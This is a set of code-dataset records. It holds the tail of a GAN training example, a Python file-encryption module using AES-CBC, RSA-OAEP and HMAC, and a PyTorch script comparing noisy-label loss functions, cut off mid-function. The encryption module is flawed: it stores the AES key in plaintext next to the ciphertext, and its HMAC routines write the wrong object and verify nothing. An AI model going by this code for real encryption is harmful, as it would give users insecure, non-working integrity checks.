batch_size=model_parameters.batch_size,\n generator=generator,\n discriminator=discriminator,\n training_name='VANILLA_GAN_MODEL_SIGMOID',\n generator_optimizer=generator_optimizer,\n discriminator_optimizer=discriminator_optimizer,\n latent_size=model_parameters.latent_size,\n continue_training=False,\n save_images_every_n_steps=model_parameters.save_images_every_n_steps,\n validation_dataset=validation_dataset,\n callbacks=callbacks,\n)\n\ngan_trainer.train(\n dataset=dataset,\n num_epochs=model_parameters.num_epochs,\n)\n","sub_path":"Experimentation/MnistGAN/gans2/examples/vanilla_gan_function_modeling_sigmoid.py","file_name":"vanilla_gan_function_modeling_sigmoid.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"398983794","text":"import os\r\nimport os.path\r\nimport base64\r\nimport json\r\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\r\nfrom cryptography.hazmat.backends import default_backend\r\nfrom cryptography.hazmat.primitives import padding as paddingPK\r\nfrom cryptography.hazmat.primitives.asymmetric import padding as paddingOA\r\nfrom cryptography.hazmat.primitives.asymmetric import rsa\r\nfrom cryptography.hazmat.primitives import serialization\r\nfrom cryptography.hazmat.primitives import hashes, hmac\r\n\r\nbackend = default_backend()\r\n\r\ndef Myencrypt(message, key):\r\n # Check to see if the key is at least 32 bytes\r\n if(len(key) < 32):\r\n raise ValueError('The key is too short! (Must be 32 bytes in length.)')\r\n \r\n # Generate iv and initialized ciper and encryptor objects\r\n iv = os.urandom(16)\r\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)\r\n encryptor = cipher.encryptor()\r\n \r\n # Initialize the padder object\r\n padder = paddingPK.PKCS7(128).padder()\r\n # Techinically useless but too scared to remove\r\n byte_message = message\r\n # Adds padding to the data\r\n padded_data = padder.update(byte_message)\r\n padded_data += padder.finalize()\r\n \r\n # Encrypt the padded data\r\n ct = encryptor.update(padded_data) + encryptor.finalize()\r\n \r\n # Store the ct and iv in a dictionary\r\n temp_data = {}\r\n temp_data['ct'] = ct\r\n temp_data['iv'] = iv\r\n \r\n return temp_data\r\n\r\n\r\ndef Mydecrypt(ciphertext, key, iv):\r\n # Initialize the cipher and decryptor objects\r\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)\r\n decryptor = cipher.decryptor()\r\n \r\n # Decrypts the padded data\r\n padded_data = decryptor.update(ciphertext) + decryptor.finalize()\r\n \r\n # Initializes the unpadder object\r\n unpadder = paddingPK.PKCS7(128).unpadder()\r\n \r\n # Unpad the data\r\n data = unpadder.update(padded_data)\r\n data += unpadder.finalize()\r\n return data\r\n\r\n\r\ndef Myfileencrypt(filepath):\r\n # Generate a random key\r\n key = os.urandom(32)\r\n \r\n # Extract the filename and extension\r\n file_name = os.path.basename(filepath)\r\n extension = os.path.splitext(file_name)[1]\r\n \r\n # Check if the file is a text file or an image\r\n # Then opens the file and stores the data\r\n with open(filepath, \"rb\") as file:\r\n file_data = file.read()\r\n\r\n # Encrypt the data\r\n enc_data = Myencrypt(file_data, key)\r\n \r\n # Encode the ciphertext\r\n ct = enc_data['ct']\r\n b64_ct = base64.b64encode(ct)\r\n str_ct = b64_ct.decode(\"utf-8\") \r\n \r\n # Encode the iv\r\n iv = enc_data['iv']\r\n b64_iv = base64.b64encode(iv)\r\n str_iv = b64_iv.decode(\"utf-8\") \r\n \r\n # Encode the key\r\n b64_key = base64.b64encode(key)\r\n str_key = b64_key.decode(\"utf-8\")\r\n \r\n # Store the data into a dictionary\r\n temp_data = {}\r\n temp_data['ct'] = str_ct\r\n temp_data['iv'] = str_iv\r\n temp_data['file_name'] = file_name\r\n temp_data['ext'] = extension\r\n temp_data['key'] = str_key\r\n \r\n # Convert the dictionary to a JSON\r\n json_str = json.dumps(temp_data)\r\n\r\n # Write the JSON to disk\r\n fh = open(file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Return JSON filepath\r\n return file_name + \" json.txt\"\r\n \r\n\r\n # Input is JSON filepath\r\ndef Myfiledecrypt(json_filepath):\r\n \r\n # Read JSON from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # Convert JSON to dictionary\r\n data = json.loads(json_str)\r\n \r\n # Extract the data in the dictionary\r\n key = data['key']\r\n ext = data['ext']\r\n iv = data['iv']\r\n file_name = data['file_name']\r\n \r\n # Decode the ct\r\n str_ct = data['ct']\r\n b64_ct = str_ct.encode(\"utf-8\")\r\n ct = base64.b64decode(b64_ct)\r\n \r\n # Decode the iv\r\n str_iv = data['iv']\r\n b64_iv = str_iv.encode(\"utf-8\")\r\n iv = base64.b64decode(b64_iv)\r\n \r\n # Decode the key\r\n str_key = data['key']\r\n b64_key = str_key.encode(\"utf-8\")\r\n key = base64.b64decode(b64_key)\r\n \r\n # Decrypt the ciphertext\r\n pt = Mydecrypt(ct, key, iv)\r\n \r\n # Check if the file is a text file or an image\r\n # Then generate a new file with the unencrypted data\r\n fh = open(file_name + \" unencrypted\" + ext, \"wb\")\r\n fh.write(pt)\r\n fh.close()\r\n \r\n return file_name + \" unencrypted\" + ext\r\n \r\ndef MyRSAEncrypt(filepath, RSA_publickey_filepath):\r\n \r\n # Encrypt the file data\r\n enc_data = Myfileencrypt(filepath)\r\n \r\n # Extract the data from the JSON\r\n with open(enc_data, \"rb\") as file:\r\n json_str = file.read()\r\n data = json.loads(json_str)\r\n ct = data['ct']\r\n iv = data['iv']\r\n ext = data['ext']\r\n file_name = data['file_name']\r\n str_key = data['key']\r\n \r\n # Read the RSA public key from disk\r\n with open(RSA_publickey_filepath, \"rb\") as key_file:\r\n public_key = serialization.load_pem_public_key(\r\n key_file.read(),\r\n backend=default_backend()\r\n )\r\n \r\n # Decode the key\r\n b64_key = str_key.encode(\"utf-8\")\r\n key = base64.b64decode(b64_key)\r\n \r\n # Encrypt the key\r\n RSA_ct = public_key.encrypt(\r\n key,\r\n paddingOA.OAEP(\r\n mgf=paddingOA.MGF1(algorithm=hashes.SHA256()),\r\n algorithm=hashes.SHA256(),\r\n label=None\r\n )\r\n )\r\n # Encode the ciphertext\r\n b64_RSA_ct = base64.b64encode(RSA_ct)\r\n str_RSA_ct = b64_RSA_ct.decode(\"utf-8\")\r\n \r\n # Package everything into a dictionary\r\n dict_data = {}\r\n dict_data['RSAcipher'] = str_RSA_ct\r\n dict_data['ct'] = ct\r\n dict_data['iv'] = iv\r\n dict_data['ext'] = ext\r\n dict_data['file_name'] = file_name\r\n \r\n # Convert the dictionary to a JSON\r\n json_str = json.dumps(dict_data)\r\n\r\n # Write the JSON to disk\r\n fh = open(file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Return JSON filepath\r\n return file_name + \" json.txt\"\r\n \r\ndef MyRSADecrypt(json_filepath):\r\n \r\n # Read JSON from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # Convert JSON to dictionary\r\n data = json.loads(json_str)\r\n \r\n # Unpackage the dictionary\r\n str_RSA_ct = data['RSAcipher']\r\n ct = data['ct']\r\n iv = data['iv']\r\n ext = data['ext']\r\n file_name = data['file_name']\r\n \r\n # Decode the ciphertext\r\n b64_RSA_ct = str_RSA_ct.encode(\"utf-8\") \r\n RSA_ct = base64.b64decode(b64_RSA_ct)\r\n \r\n # Read the private key from disk\r\n pr_key_path = \"RSA private key.pem\"\r\n with open(pr_key_path, \"rb\") as key_file:\r\n private_key = serialization.load_pem_private_key(\r\n key_file.read(),\r\n password=None,\r\n backend=default_backend()\r\n )\r\n # Decrypt the key\r\n key = private_key.decrypt(\r\n RSA_ct,\r\n paddingOA.OAEP(\r\n mgf=paddingOA.MGF1(algorithm=hashes.SHA256()),\r\n algorithm=hashes.SHA256(),\r\n label=None\r\n )\r\n )\r\n \r\n # Encode the key\r\n b64_key = base64.b64encode(key)\r\n str_key = b64_key.decode(\"utf-8\")\r\n \r\n # Generate a new JSON to pass into Myfiledecrypt\r\n dict_data = {}\r\n dict_data['ct'] = ct\r\n dict_data['iv'] = iv\r\n dict_data['ext'] = ext\r\n dict_data['file_name'] = file_name\r\n dict_data['key'] = str_key\r\n \r\n json_str = json.dumps(dict_data)\r\n \r\n fh = open(\"new\" + file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Decrypt the file\r\n unenc_path = Myfiledecrypt(\"new\" + file_name + \" json.txt\")\r\n \r\n # Return the unencrypted file's path\r\n return unenc_path\r\n\r\n\r\ndef MyencryptMAC(message, EncKey, HMACKey):\r\n \r\n # Encrypt the file\r\n json_filepath = MyRSAEncrypt(message, EncKey)\r\n \r\n # Read the file from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # HMAC the file\r\n h = hmac.HMAC(HMACKey, hashes.SHA256(), backend=default_backend())\r\n h.update(json_str)\r\n h.finalize()\r\n \r\n # Extract the filename\r\n file_name = os.path.basename(json_filepath)\r\n \r\n # Write the hash to disk\r\n fh = open(file_name + \" HMAC.txt\", \"w\")\r\n fh.write(h)\r\n \r\n # Return the hash filepath\r\n return file_name + \" HMAC.txt\"\r\n\r\ndef MydecryptMAC(HMAC_filepath, HMACkey, json_filepath):\r\n \r\n # Read the file from disk\r\n with open(HMAC_filepath, \"rb\") as file:\r\n HMAC_str = file.read()\r\n \r\n # Verify the file\r\n h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n h.verify(HMAC_str)\r\n \r\n # Decrypt the file\r\n pt_filepath = MyRSADecrypt(json_filepath)\r\n \r\n # Return the plaintext filepath\r\n return pt_filepath\r\n \r\ndef MyfileEncryptMAC(filepath, HMACkey, RSA_publickey_filepath):\r\n \r\n # Encrypt the file\r\n json_filepath = MyRSAEncrypt(filepath, RSA_publickey_filepath)\r\n \r\n #Read the file from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # HMAC the file\r\n h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n h.update(json_str)\r\n h.finalize()\r\n \r\n # Extract the filename\r\n file_name = os.path.basename(json_filepath)\r\n \r\n # Write the hash to disk\r\n fh = open(file_name + \" HMAC.txt\", \"w\")\r\n fh.write(h)\r\n \r\n # Return the hash filepath\r\n return file_name + \" HMAC.txt\"\r\n\r\n\r\ndef MyfileDecryptMAC(HMAC_filepath, HMACkey, json_filepath):\r\n \r\n # Read the HMAC file from disk\r\n with open(HMAC_filepath, \"rb\") as file:\r\n HMAC_str = file.read()\r\n \r\n # Verify the file\r\n h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n h.verify(HMAC_str)\r\n \r\n # Decrypt the file\r\n pt_filepath = Myfiledecrypt(json_filepath)\r\n \r\n # Return the plaintext filepath\r\n return pt_filepath","sub_path":"MyEncrypt/myEncrypt.py","file_name":"myEncrypt.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"511727431","text":"# original code: https://github.com/dyhan0920/PyramidNet-PyTorch/blob/master/train.py\nimport sys\nimport time \nimport argparse\nimport os\nimport shutil\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\n\nfrom models import resnet as RN\nfrom models import pyramidnet as PYRM\nfrom models import vgg as VGG\nfrom models import wideresnet as WR \nfrom models import shufflenetv2 as SN\nfrom models import mobilenetv2 as MN\nfrom models import resnext as RNX\nfrom models import densenet as DN\nfrom models.iccv19_resnet import *\n#from models.iccv19_resnet_ds import *\nfrom models.preactresnet import CIFAR_ResNet18, CIFAR_ResNet34 \nfrom tensorboardX import SummaryWriter\nfrom loss_all_methods import SCELoss, label_smooth, generalized_cross_entropy, joint_optimization, boot_soft, boot_hard, Forward, Backward, DisturbLabel, PC\nimport random\nimport utils\nimport numpy as np\nimport cv2\nimport warnings\nimport random\nfrom PIL import Image, ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES=True\n\nwarnings.filterwarnings(\"ignore\")\n\nmodel_names = sorted(name for name in models.__dict__\n if name.islower() and not name.startswith(\"__\")\n and callable(models.__dict__[name]))\n \n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR-10, CIFAR-100 and ImageNet-1k Training')\nparser.add_argument('--net_type', default='pyramidnet', type=str,\n help='networktype: resnet, and pyamidnet')\nparser.add_argument('-j', '--workers', default=16, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--start_epoch', default=0, type=int, metavar='N',\n help='start epoch to run')\nparser.add_argument('--epochs', default=90, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('-b', '--batch_size', default=128, type=int,\n metavar='N', help='mini-batch size (default: 256)')\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--print-freq', '-p', default=1000, type=int,\n metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--depth', default=32, type=int,\n help='depth of the network (default: 32)')\nparser.add_argument('--no-bottleneck', dest='bottleneck', action='store_false',\n help='to use basicblock for CIFAR datasets (default: bottleneck)')\nparser.add_argument('--dataset', dest='dataset', default='imagenet', type=str,\n help='dataset (options: cifar10, cifar100, and imagenet)')\nparser.add_argument('--no-verbose', dest='verbose', action='store_false',\n help='to print the status at every iteration')\n#parser.add_argument('--alpha', default=300, type=float,\n# help='number of new channel increases per depth (default: 300)')\nparser.add_argument('--expname', default='TEST', type=str,\n help='name of experiment')\nparser.add_argument('--save_dir', default='./', type=str,\n help='model saved dir')\nparser.add_argument('--seed', type=int, default=2019, help='random seed')\nparser.add_argument('--resume', default=None, type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('--pretrained', default='./runs/pretrained_model/resnet50-19c8e357.pth', type=str, metavar='PATH',\n\t\t\t\t\thelp='path to resnet50 pretrained pth.')\nparser.add_argument('--dali_cpu', action='store_true',\n help='Runs CPU based version of DALI pipeline.')\nparser.add_argument('--width', default=None, type=int, help='the widen factor of wideresnet')\n\nparser.add_argument(\"--local_rank\", default=0, type=int)\nparser.add_argument(\"--phase\", default=None, type=int)\n\nparser.add_argument('--theta', default=0.5, type=float)\nparser.add_argument('--method', default=None, type=str, help='ce, sce, ls, gce, jo, bootsoft, boothard, forward, backward, disturb')\nparser.add_argument('--olsalpha', default=None, type=float)\nparser.add_argument('--T', default=1.0, type=float, help='temprature to scale')\n\nparser.set_defaults(bottleneck=True)\nparser.set_defaults(verbose=True)\n\nbest_err1 = 100\nbest_err5 = 100\nnumberofclass = 1000\n\ndef main():\n global args, best_err1, best_err5, numberofclass \n args = parser.parse_args()\n \n assert args.method in ['ce', 'ols', 'sce', 'ls', 'gce', 'jo', 'bootsoft', 'boothard', 'forward', 'backward', 'disturb', 'PC'], \\\n \"method must be the one of 'ce', 'sce', 'ls', 'gce', 'jo', 'bootsoft', 'boothard', 'forward', 'backward', 'disturb', 'PC' \"\n \n args.gpu = 0\n args.world_size = 1\n \n print(args)\n log_dir = '%s/runs/record_dir/%s/' % (args.save_dir, args.expname)\n writer = SummaryWriter(log_dir=log_dir)\n \n if args.seed is not None:\n print('set the same seed for all.....')\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n\n\n if args.dataset.startswith('cifar'):\n normalize = transforms.Normalize(mean=[x / 255.0 for x in [125.3, 123.0, 113.9]],\n std=[x / 255.0 for x in [63.0, 62.1, 66.7]])\n\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n normalize\n ])\n\n if args.dataset == 'cifar100':\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR100('./data', train=True, download=True, transform=transform_train),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR100('./data', train=False, transform=transform_test),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n numberofclass = 100\n elif args.dataset == 'cifar10':\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=True, download=True, transform=transform_train),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=False, transform=transform_test),\n batch_size=args.batch_size, shuffle=False, num_workers=args.workers, pin_memory=False)\n numberofclass = 10\n else:\n raise Exception('unknown dataset: {}'.format(args.dataset))\n \n elif args.dataset == 'imagenet':\n traindir = os.path.join('./data/ILSVRC1/train')\n valdir = os.path.join('./data/ILSVRC1/val1')\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n jittering = utils.ColorJitter(brightness=0.4, contrast=0.4,\n saturation=0.4)\n lighting = utils.Lighting(alphastd=0.1,\n eigval=[0.2175, 0.0188, 0.0045],\n eigvec=[[-0.5675, 0.7192, 0.4009],\n [-0.5808, -0.0045, -0.8140],\n [-0.5836, -0.6948, 0.4203]])\n\n train_dataset = datasets.ImageFolder(\n traindir,\n transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n jittering,\n lighting,\n normalize,\n ]))\n\n train_sampler = None\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=(train_sampler is None),\n num_workers=args.workers, pin_memory=False, sampler=train_sampler)\n\n val_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(valdir, transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=False)\n numberofclass = 1000\n\n \n \n print(\"=> creating model '{}'\".format(args.net_type))\n # define loss function (criterion) and optimizer\n solver = Solver()\n\n solver.model = solver.model.cuda()\n print('the number of model parameters: {}'.format(sum([p.data.nelement() for p in solver.model.parameters()])))\n cudnn.benchmark = True\n\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch']\n best_err1 = checkpoint['best_err1']\n solver.model.load_state_dict(checkpoint['state_dict'])\n solver.optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n \n \n for epoch in range(args.start_epoch, args.epochs): \n print('current os time = ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n adjust_learning_rate(solver.optimizer, epoch)\n # train for one epoch\n train_loss = solver.train(train_loader, epoch)\n # evaluate on validation set\n err1, err5, val_loss = solver.validate(val_loader, epoch)\n\n writer.add_scalar('training loss', train_loss, epoch)\n writer.add_scalar('testing loss', val_loss, epoch)\n writer.add_scalar('top1 error', err1, epoch)\n writer.add_scalar('top5 error', err5, epoch)\n\n # remember best prec@1 and save checkpoint\n is_best = err1 <= best_err1\n best_err1 = min(err1, best_err1)\n if is_best:\n best_err5 = err5\n \n print('Current best accuracy (top-1 and 5 error):', best_err1, best_err5)\n save_checkpoint({\n 'epoch': epoch,\n 'arch': args.net_type,\n 'state_dict': solver.model.state_dict(),\n 'best_err1': best_err1,\n 'best_err5': best_err5,\n 'optimizer': solver.optimizer.state_dict(),\n }, is_best)\n\n print('Best accuracy (top-1 and 5 error):', best_err1, best_err5)\n print('method = {}, expname = {}'.format(args.method, args.expname))\n loss_dir = \"%s/runs/record_dir/%s/\" % (args.save_dir, args.expname)\n writer.export_scalars_to_json(loss_dir + 'loss.json')\n writer.close()\n\nclass Solver():\n def __init__(self):\n super(Solver, self).__init__()\n global numberofclass \n \n #define the network\n if args.net_type == 'resnet':\n self.model = RN.ResNet(dataset=args.dataset, depth=args.depth, num_classes=numberofclass, bottleneck=args.bottleneck)\n \n elif args.net_type == 'pyramidnet':\n self.model = PYRM.PyramidNet(args.dataset, args.depth, args.alpha, numberofclass,\n args.bottleneck)\n \n elif args.net_type == 'wideresnet':\n self.model = WR.WideResNet(depth=args.depth, num_classes=numberofclass, widen_factor=args.width)\n \n elif args.net_type == 'vggnet':\n self.model = VGG.vgg16(num_classes=numberofclass)\n \n elif args.net_type == 'mobilenet':\n self.model = MN.mobile_half(num_classes=numberofclass)\n \n elif args.net_type == 'shufflenet':\n self.model = SN.ShuffleV2(num_classes=numberofclass)\n \n elif args.net_type == 'densenet':\n self.model = DN.densenet_cifar(num_classes=numberofclass)\n \n elif args.net_type == 'resnext29-2':\n self.model = RNX.ResNeXt29_2x64d(num_classes=numberofclass)\n elif args.net_type == 'resnext29-4':\n self.model = RNX.ResNeXt29_4x64d(num_classes=numberofclass)\n elif args.net_type == 'resnext29-32':\n self.model = RNX.ResNeXt29_32x4d(num_classes=numberofclass)\n \n elif args.net_type == 'imagenetresnet18':\n self.model = multi_resnet18_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet34':\n self.model = multi_resnet34_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet50':\n self.model = multi_resnet50_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet101':\n self.model = multi_resnet101_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet152':\n self.model = multi_resnet152_kd(num_classes=numberofclass)\n else:\n raise Exception('unknown network architecture: {}'.format(args.net_type))\n\n \n\n \n self.optimizer = torch.optim.SGD(self.model.parameters(), args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay, nesterov=True)\n self.loss_lams = torch.zeros(numberofclass, numberofclass, dtype=torch.float32).cuda()\n self.loss_lams.requires_grad = False \n #define the loss function\n if args.method == 'ce':\n self.criterion = nn.CrossEntropyLoss()\n elif args.method == 'sce':\n if args.dataset == 'cifar10':\n self.criterion = SCELoss(alpha=0.1, beta=1.0, num_classes=numberofclass)\n else:\n self.criterion = SCELoss(alpha=6.0, beta=0.1, num_classes=numberofclass)\n elif args.method == 'ls':\n self.criterion = label_smooth(num_classes=numberofclass)\n elif args.method == 'gce':\n self.criterion = generalized_cross_entropy(num_classes=numberofclass)\n elif args.method == 'jo':\n self.criterion = joint_optimization(num_classes=numberofclass)\n elif args.method == 'bootsoft':\n self.criterion = boot_soft(num_classes=numberofclass)\n elif args.method == 'boothard':\n self.criterion = boot_hard(num_classes=numberofclass)\n elif args.method == 'forward':\n self.criterion = Forward(num_classes=numberofclass)\n elif args.method == 'backward':\n self.criterion = Backward(num_classes=numberofclass)\n elif args.method == 'disturb':\n self.criterion = DisturbLabel(num_classes=numberofclass)\n elif args.method == 'ols':\n self.criterion = nn.CrossEntropyLoss()\n elif args.method == 'PC':\n self.criterion = PC(100)\n self.criterion = self.criterion.cuda()\n \n\n def update_loss_lams(self, output, target):\n with torch.no_grad():\n logits = torch.softmax(output, dim=1)\n sort_args = torch.argsort(logits, dim=1, descending=True)\n for k in range(output.shape[0]):\n if target[k] != sort_args[k, 0]:\n continue\n self.cur_epoch_lams[target[k]] += logits[k]\n self.cur_epoch_cnt[target[k]] += 1\n def update_loss_lams2(self, output, target):\n with torch.no_grad():\n logits = output / args.T\n sort_args = torch.argsort(logits, dim=1, descending=True)\n for k in range(output.shape[0]):\n if target[k] != sort_args[k, 0]:\n continue\n self.cur_epoch_lams[target[k]] += logits[k]\n self.cur_epoch_cnt[target[k]] += 1\n \n \n def soft_cross_entropy(self, output, target): \n target_prob = torch.zeros_like(output)\n batch = output.shape[0]\n for k in range(batch):\n target_prob[k] = self.loss_lams[target[k]]\n log_like = -torch.nn.functional.log_softmax(output, dim=1)\n loss = torch.sum(torch.mul(log_like, target_prob)) / batch \n return loss\n def kd_loss(self, output, target):\n target_prob = torch.zeros_like(output)\n batch = output.shape[0]\n for k in range(batch):\n target_prob[k] = self.loss_lams[target[k]]\n ps = torch.nn.functional.log_softmax(output / args.T, dim=1)\n log_like = torch.nn.functional.kl_div(ps, target_prob, size_average=False)\n log_like = log_like * (args.T ** 2) / batch\n return log_like\n def sce_loss(self, output, onehot):\n log_like = -torch.nn.functional.log_softmax(output, dim=1)\n loss = torch.sum(torch.mul(log_like, onehot)) / output.shape[0]\n return loss\n \n def train(self, train_loader, epoch):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n \n global numberofclass \n\n # switch to train mode\n self.model.train()\n end = time.time()\n current_LR = get_learning_rate(self.optimizer)[0]\n \n self.cur_epoch_lams = torch.zeros(numberofclass, numberofclass, dtype=torch.float32).cuda()\n self.cur_epoch_cnt = torch.zeros(numberofclass, dtype=torch.float32).cuda()\n self.cur_epoch_lams.requires_grad = False\n self.cur_epoch_cnt.requires_grad = False\n for i, (input, target) in enumerate(train_loader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n input = input.cuda()\n target = target.cuda()\n input_var = torch.autograd.Variable(input, requires_grad=True)\n \n \n # compute output\n output = self.model(input_var)\n \n if args.method == 'ols':\n self.update_loss_lams(output, target)\n args.T = 1.\n loss = 0.5 * self.criterion(output, target) + \\\n 0.5 * self.soft_cross_entropy(output, target)\n elif args.method == 'ls':\n loss = self.criterion(output, target)\n elif args.method == 'PC':\n if epoch < 200:\n loss = torch.nn.functional.cross_entropy(output, \\\n target)\n else:\n loss = self.criterion(output, target)\n else:\n loss = self.criterion(output, target)\n \n #measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # compute gradient and do SGD step\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n \n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n \n \n \n if i % args.print_freq == 0 and args.verbose == True:\n print('Epoch: [{0}/{1}][{2}/{3}]\\t'\n 'LR: {LR:.6f}\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, len(train_loader), LR=current_LR, batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n \n if args.method == 'ols': \n for cls in range(numberofclass):\n if self.cur_epoch_cnt[cls].max() < 0.5:\n self.loss_lams[cls] = 1. / numberofclass \n else:\n self.loss_lams[cls] = self.cur_epoch_lams[cls] / self.cur_epoch_cnt[cls] \n return losses.avg\n\n def validate(self, val_loader, epoch):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n self.model.eval()\n end = time.time()\n\n for i, (input, target) in enumerate(val_loader):\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n target_var = torch.autograd.Variable(target)\n with torch.no_grad():\n output = self.model(input_var)\n loss = self.criterion(output, target_var)\n # measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0 and args.verbose == True:\n print('Test (on val set): [{0}/{1}][{2}/{3}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, 196, batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n\n print('* Epoch: [{0}/{1}]\\t Top 1-err {top1.avg:.3f} Top 5-err {top5.avg:.3f}\\t Test Loss {loss.avg:.3f}'.format(\n epoch, args.epochs, top1=top1, top5=top5, loss=losses))\n return top1.avg, top5.avg, losses.avg\n def save_scripts(self, val_loader, epoch, prop):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n self.model.eval()\n end = time.time()\n\n save_name = args.net_type + '_' + args.method + '_' + prop \n embedding = []\n labels = []\n\n for i, (input, target) in enumerate(val_loader):\n if i > 80:\n break\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n target_var = torch.autograd.Variable(target)\n with torch.no_grad():\n output, ebd = self.model(input_var)\n for j in range(ebd.shape[0]):\n embedding.append(ebd[j].detach().cpu().numpy())\n labels.append(target[j].detach().cpu().numpy())\n \n loss = self.criterion(output, target_var)\n # measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0 and args.verbose == True:\n print('Test (on val set): [{0}/{1}][{2}/{3}]\\t'\n 